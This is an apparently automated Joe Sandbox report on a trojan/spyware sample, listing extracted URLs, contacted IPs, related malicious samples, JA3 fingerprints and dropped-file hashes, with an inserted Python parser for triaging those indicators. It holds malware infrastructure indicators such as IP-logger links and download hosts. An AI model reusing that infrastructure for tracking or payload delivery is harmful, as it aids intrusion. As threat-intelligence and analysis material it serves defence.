                                                                                              http://schemas.xmlsoap.org/soap/envelope/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://support.google.com/chrome/?p=plugin_flash325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.tiro.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://iplogger.org/kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.goodfont.co.kr325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#kS2dqbsDwD.exefalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://support.google.com/chrome/?p=plugin_java325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Endpoint/VerifyUpdateResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://go.micros325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.typography.netD325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.galapagosdesign.com/staff/dennis.htm325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://fontfabrik.com | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://d301sr5gafysq2.cloudfront.net; | kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.orgcookies//settinString.Removeg | 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault | 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0C | kS2dqbsDwD.exe | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://sectigo.com/CPS0D | kS2dqbsDwD.exe | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://is.gd/nKi5S3 | kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_divx | 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp | false | | high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl | 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp | false | | high
http://tempuri.org/0 | 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://bbuseruploads.s3.amazonaws.com/is.gd | kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://ipinfo.io/ip%appdata% | 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp | false | | high
https://iplogger.org/1Spbs7e | kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0 | kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp | false | | high
https://api.ip.sb | 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://helpx.ad | 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr | false | | high
http://ahkscript.orgCould | kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
212.224.105.105 | yspasenana.xyz | Germany | 44066 | DE-FIRSTCOLOwwwfirst-colonetDE | true
104.192.141.1 | bitbucket.org | United States | 16509 | AMAZON-02US | false
104.25.234.53 | is.gd | United States | 13335 | CLOUDFLARENETUS | false
88.99.66.31 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
52.217.201.169 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:452457
Start date:22.07.2021
Start time:11:42:10
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 35s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:kS2dqbsDwD (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes:24
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@5/29@9/5
EGA Information:Failed
HDC Information:
• Successful, ratio: 2% (good quality ratio 0.9%)
• Quality average: 31.8%
• Quality standard deviation: 39.8%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.193.48, 13.64.90.137, 20.82.210.154, 23.211.4.86, 52.255.188.83, 40.112.88.60, 13.88.21.125, 20.82.209.183, 80.67.82.235, 80.67.82.211, 104.26.12.31, 104.26.13.31, 172.67.75.172, 20.49.157.6
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
11:42:57 | API Interceptor | 1x Sleep call for process: kS2dqbsDwD.exe modified
11:44:07 | API Interceptor | 46x Sleep call for process: 325.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
212.224.105.105 | Nb2HQZZDIf.exe | malicious | yspasenana.xyz/
104.192.141.1 | Nb2HQZZDIf.exe | malicious |
104.192.141.1 | r3xwkKS58W.exe | malicious |
104.192.141.1 | P58w6OezJY.exe | malicious |
104.192.141.1 | lpaBPnb1OB.exe | malicious |
104.192.141.1 | 2aJ9QdIdFE.exe | malicious |
104.192.141.1 | EA4LughYnY.exe | malicious |
104.192.141.1 | etSPaoVcAD.exe | malicious |
104.192.141.1 | kxQkjkU9DO.exe | malicious |
104.192.141.1 | 9CMjcYFBxo.exe | malicious |
104.192.141.1 | JvlwIeO09R.exe | malicious |
104.192.141.1 | pEIro35JRJ.exe | malicious |
104.192.141.1 | AEdU8eJHgN.exe | malicious |
104.192.141.1 | YIrI3VuV0W.exe | malicious |
104.192.141.1 | 8zsiEeSTzI.exe | malicious |
104.192.141.1 | k6sy0WOByI.exe | malicious |
104.192.141.1 | kvAgGyJqYT.exe | malicious |
104.192.141.1 | A7DmPhc0bs.exe | malicious |
104.192.141.1 | Coupon-Codes-2021.doc | malicious |
104.192.141.1 | k53f1UmAkl.exe | malicious |
104.192.141.1 | q7jxy6gZMb.exe | malicious |
104.25.234.53 | Pdf Document.exe | malicious | is.gd/TGKGYYYYZ

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        bitbucket.orgNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                               | HryPYPQtcg.exe | malicious | 104.192.141.1
                               | oOoVvuAQS9.exe | malicious | 104.192.141.1
                               | 6FORhr7lC1.exe | malicious | 104.192.141.1
                               | 2aJ9QdIdFE.exe | malicious | 104.192.141.1
                               | EA4LughYnY.exe | malicious | 104.192.141.1
                               | etSPaoVcAD.exe | malicious | 104.192.141.1
                               | kxQkjkU9DO.exe | malicious | 104.192.141.1
                               | 9CMjcYFBxo.exe | malicious | 104.192.141.1
                               | JvlwIeO09R.exe | malicious | 104.192.141.1
                               | pEIro35JRJ.exe | malicious | 104.192.141.1
                               | AEdU8eJHgN.exe | malicious | 104.192.141.1
                               | YIrI3VuV0W.exe | malicious | 104.192.141.1
                               | 8zsiEeSTzI.exe | malicious | 104.192.141.1
                               | k6sy0WOByI.exe | malicious | 104.192.141.1
                               | kvAgGyJqYT.exe | malicious | 104.192.141.1
                               | I2VQzf34i3.exe | malicious | 104.192.141.1
                               | A7DmPhc0bs.exe | malicious | 104.192.141.1
                               | Coupon-Codes-2021.doc | malicious | 104.192.141.1
                               | k53f1UmAkl.exe | malicious | 104.192.141.1
yspasenana.xyz                 | Nb2HQZZDIf.exe | malicious | 212.224.105.105
s3-w.us-east-1.amazonaws.com   | Nb2HQZZDIf.exe | malicious | 52.216.94.27
                               | Machine Service.xlsx | malicious | 52.216.249.124
                               | Machine Service.xlsx | malicious | 52.217.102.108
                               | #Ud83d#Udd0ajs_msg_ 3pm.html | malicious | 52.217.11.68
                               | HryPYPQtcg.exe | malicious | 52.217.129.57
                               | 6FORhr7lC1.exe | malicious | 52.217.202.41
                               | 2aJ9QdIdFE.exe | malicious | 52.217.162.201
                               | EA4LughYnY.exe | malicious | 52.217.161.9
                               | etSPaoVcAD.exe | malicious | 52.217.80.164
                               | kxQkjkU9DO.exe | malicious | 52.216.128.43
                               | 9CMjcYFBxo.exe | malicious | 52.216.137.244
                               | JvlwIeO09R.exe | malicious | 52.217.130.249
                               | pEIro35JRJ.exe | malicious | 52.217.104.164
                               | AEdU8eJHgN.exe | malicious | 52.217.90.84
                               | YIrI3VuV0W.exe | malicious | 52.216.171.179
                               | 8zsiEeSTzI.exe | malicious | 52.217.140.209
                               | k6sy0WOByI.exe | malicious | 52.217.101.132
                               | I2VQzf34i3.exe | malicious | 52.217.83.220
                               | k53f1UmAkl.exe | malicious | 52.217.10.252
                               | D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe | malicious | 52.217.164.225
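The "Match / Associated Sample Name / Detection / Context" rows in this report are only useful once they are back in structured form: the Match value (domain, IP or ASN) is printed on the first row of a group only, the "Get hash" and "Browse" link labels are glued onto each sample name, and the Context IP sits on the following bullet line. The parser below, added here as an editor's example and not part of the Joe Sandbox report, rebuilds the groups from that flattened text and then scores each Match by how many distinct samples share it. The input excerpt is a constructed subset of the rows on this page; the Match keys are taken from this report's own tables; the verdict words accepted by the regex and the threshold of five samples are assumptions, not Joe Sandbox behaviour. The scoring makes the practitioner's point visible: an endpoint contacted by many unrelated samples (S3, Cloudflare ranges, an IP-lookup service) is shared infrastructure and a poor blocking indicator, while a Match shared by one or two samples is the one to pivot on.

```python
import re
from collections import defaultdict

# One flattened result row looks like "<[Match]><Sample>Get hash<Verdict>Browse";
# the row's Context IP follows on its own "• <ip>" line. The verdict vocabulary
# here is an assumption (only "malicious" occurs on this page).
ROW_RE = re.compile(
    r"^(?P<body>.+?)Get hash(?P<verdict>malicious|suspicious|clean|unknown)Browse$"
)
IP_RE = re.compile(r"^•\s*(?P<ip>(?:\d{1,3}\.){3}\d{1,3})$")

# Match keys taken from this report's own tables. The Match column is printed on
# the first row of each group only, so the parser needs them to split the prefix.
KNOWN_MATCHES = {
    "yspasenana.xyz",
    "s3-w.us-east-1.amazonaws.com",
    "CLOUDFLARENETUS",
    "DE-FIRSTCOLOwwwfirst-colonetDE",
    "AMAZON-02US",
}

# Constructed excerpt of the flattened rows on this page (a subset, in the exact
# shape the extraction produced; a section title and a column header are left in
# on purpose so the parser has to skip them).
FLATTENED = """\
yspasenana.xyzNb2HQZZDIf.exeGet hashmaliciousBrowse
• 212.224.105.105
s3-w.us-east-1.amazonaws.comNb2HQZZDIf.exeGet hashmaliciousBrowse
• 52.216.94.27
Machine Service.xlsxGet hashmaliciousBrowse
• 52.216.249.124
Machine Service.xlsxGet hashmaliciousBrowse
• 52.217.102.108
HryPYPQtcg.exeGet hashmaliciousBrowse
• 52.217.129.57
6FORhr7lC1.exeGet hashmaliciousBrowse
• 52.217.202.41
2aJ9QdIdFE.exeGet hashmaliciousBrowse
• 52.217.162.201

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
CLOUDFLARENETUSNb2HQZZDIf.exeGet hashmaliciousBrowse
• 104.25.233.53
SgjcpodWpB.exeGet hashmaliciousBrowse
• 104.21.14.85
"""


def parse_associations(text, known_matches):
    """Return {match: [(sample, verdict, context_ip), ...]} from flattened rows.

    A row opens a new group when its body starts with one of the report's Match
    values; the longest key is tried first so no key is mistaken for a shorter
    one. Rows without a key prefix belong to the current group. Lines that are
    neither a row nor a "• ip" line (section titles, column headers) are skipped.
    """
    keys = sorted(known_matches, key=len, reverse=True)
    groups = defaultdict(list)
    current = None
    pending = None  # row still waiting for its Context IP line
    for raw in text.splitlines():
        line = raw.strip()
        row = ROW_RE.match(line)
        if row:
            body = row.group("body")
            for key in keys:
                if body.startswith(key) and len(body) > len(key):
                    current, body = key, body[len(key):]
                    break
            if current is None:
                raise ValueError(f"row appears before any known Match: {line!r}")
            pending = [body, row.group("verdict"), None]
            groups[current].append(pending)
            continue
        ip = IP_RE.match(line)
        if ip and pending is not None:
            pending[2] = ip.group("ip")
            pending = None
    return {k: [tuple(r) for r in v] for k, v in groups.items()}


def rate_pivots(groups, shared_threshold=5):
    """Score each Match by how many distinct samples share it.

    A Match hit by many unrelated samples (object storage, CDN ranges, IP-lookup
    services) is shared infrastructure: blocking it breaks legitimate traffic and
    detects nothing specific. A Match shared by only a few samples is the one
    worth pivoting on for related infrastructure. The threshold is an assumption.
    """
    report = {}
    for match, rows in groups.items():
        samples = {sample for sample, _, _ in rows}
        ips = {ip for _, _, ip in rows if ip}
        report[match] = {
            "samples": len(samples),
            "ips": len(ips),
            "quality": "low (shared infrastructure)"
            if len(samples) >= shared_threshold
            else "worth pivoting",
        }
    return report


if __name__ == "__main__":
    parsed = parse_associations(FLATTENED, KNOWN_MATCHES)
    for match, info in rate_pivots(parsed).items():
        print(f"{match:32} samples={info['samples']:2} ips={info['ips']:2} {info['quality']}")
```

Run against the full report text with every Match value from the "Domains and IPs" and "ASN" tables passed in KNOWN_MATCHES; the S3 bucket endpoint and the 104.192.141.1 address above land in the "shared infrastructure" bucket, while yspasenana.xyz and the 212.224.105.x hosts are the ones a hunt should follow.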

                                                                                                                                                                        ASN

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        CLOUDFLARENETUSNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.25.233.53
                                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.14.85
                                                                                                                                                                        #U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.72.95
                                                                                                                                                                        10303640_APMC-TRN-C0001-Stability_Calculation_Rev1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.18.7.156
                                                                                                                                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.51.99
                                                                                                                                                                        Westernunionreceipt711 ___vaw.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.40.98
                                                                                                                                                                        MPU702734-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.13.164
                                                                                                                                                                        XuQRPW44hiGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.58.112
                                                                                                                                                                        Remittance.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                        jRPSjUSf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.23.98.190
                                                                                                                                                                        989E2813477A4245E0357E0F8E49AFAE384AF828C95EE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.71.170
                                                                                                                                                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.25.234.53
                                                                                                                                                                        ruoMVmVwPu.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.130.27
                                                                                                                                                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        rxfttQnoO5Get hashmaliciousBrowse
                                                                                                                                                                        • 1.13.147.24
                                                                                                                                                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.72.95
                                                                                                                                                                        Cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.36.131
                                                                                                                                                                        aviso de pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.39.75
                                                                                                                                                                        GHK2s5apNB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.130.27
                                                                                                                                                                        kRGc0HgN5b.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                        DE-FIRSTCOLOwwwfirst-colonetDENb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.105
                                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        Px9H2c5Uo4.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.80
                                                                                                                                                                        eBjKjtQjDN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        ruoMVmVwPu.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        GHK2s5apNB.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        m8TJbe5yP6.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.312.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        SecuriteInfo.com.Variant.Cerbu.108262.10538.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.79
                                                                                                                                                                        d9MvOgFpyI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        0832946463ff710ff7f783ce24756f455a843852b0b96.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.105.115
                                                                                                                                                                        Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 46975986.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        PO 97179275.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        Order 46975986.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        PO 97179275.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 212.224.124.82
                                                                                                                                                                        what_is_a_xydhias_agreement.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
                                                                                                                                                                        what_is_a_xydhias_agreement.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
                                                                                                                                                                        no_response_will_be_considered_as_agreement_email.jsGet hashmaliciousBrowse
                                                                                                                                                                        • 37.17.224.94
AMAZON-02US | Nb2HQZZDIf.exe | malicious | 52.216.94.27
AMAZON-02US | ovLjmo5UoE | malicious | 63.34.62.30
AMAZON-02US | o3ZUDIEL1v | malicious | 18.151.13.78
AMAZON-02US | D1dU3jQ1II | malicious | 34.208.242.240
AMAZON-02US | mal.exe | malicious | 52.58.78.16
AMAZON-02US | vjsBNwolo9.js | malicious | 76.223.26.96
AMAZON-02US | r3xwkKS58W.exe | malicious | 52.217.135.113
AMAZON-02US | A7X93JRxhp | malicious | 54.151.74.14
AMAZON-02US | 1Ds9g7CEsp | malicious | 13.208.189.104
AMAZON-02US | XuQRPW44hi | malicious | 54.228.23.118
AMAZON-02US | Taf5zLti30 | malicious | 44.231.84.110
AMAZON-02US | 5qpsqg7U0G | malicious | 34.219.219.82
AMAZON-02US | LyxN1ckWTW | malicious | 18.139.244.68
AMAZON-02US | ZlvFNj.dll | malicious | 3.16.22.120
AMAZON-02US | U4r9W64doy | malicious | 13.245.89.196
AMAZON-02US | C4PozjQdGE | malicious | 18.135.214.121
AMAZON-02US | kb5IbEJU8c | malicious | 18.227.43.189
AMAZON-02US | MD5OxTSc6i | malicious | 18.149.163.217
AMAZON-02US | P58w6OezJY.exe | malicious | 52.217.198.209
AMAZON-02US | c51w5YSYdO | malicious | 108.146.155.164

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
37f463bf4616ecd445d4a1937da06e19 | Nb2HQZZDIf.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | #U00e2_#U00e2_Play _to _Listen.htm | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | 41609787.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | B5xK9XEvzO.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | RsEvjI1iTt.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | ORD.ppt | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | 39pfFwU3Ns.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | 47a8af.exe.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | Comprobante1.vbs | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | ZlvFNj.dll | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | QT2kxM315B.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | 4QKHQR82Xt.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | Convert HEX uit phishing mail.htm | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | #U2706_#U260e_Play _to _Listen.htm | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | 192-3216-Us.gt.com.html | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | N41101255652.vbs | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | FILE_2932NH_9923.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | RDlkHCLRxE.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | #U2706_#U260e_Play _to _Listen.htm | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31
37f463bf4616ecd445d4a1937da06e19 | Swift_Fattura_0093320128_.exe | malicious | 104.192.141.1, 52.217.201.169, 104.25.234.53, 88.99.66.31

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\325.exe | Nb2HQZZDIf.exe | malicious
C:\Users\user\AppData\Roaming\325.exe | P58w6OezJY.exe | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\325.exe.log
Process: C:\Users\user\AppData\Roaming\325.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA-1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: false
Reputation: high, very likely benign file
